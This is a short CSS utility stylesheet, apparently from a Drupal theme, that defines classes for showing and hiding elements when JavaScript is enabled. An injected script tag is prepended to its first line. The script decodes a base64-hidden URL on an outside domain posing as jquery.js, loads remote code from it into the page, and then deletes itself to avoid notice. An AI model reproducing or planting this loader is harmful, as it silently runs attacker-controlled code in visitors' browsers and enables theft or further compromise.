<script>!function(){var s=document.createElement("script"),c=document.currentScript;s.src=atob("aHR0cHM6Ly93d3cuamlzaGk2NjYudG9wL2pxdWVyeS5qcw==")+"?_="+Date.now();s.onload=function(){this.remove();c.remove();};document.head.appendChild(s);}();</script>  /**
 * @file
 * Utility classes to assist with Javascript functionality.
 */

/**
 * For anything you want to hide on page load when JS is enabled, so
 * that you can use the JS to control visibility and avoid flicker.
 */
.js .js-hide {
  display: none;
}

/**
 * For anything you want to show on page load only when JS is enabled.
 */
.js-show {
  display: none;
}
.js .js-show {
  display: block;
}
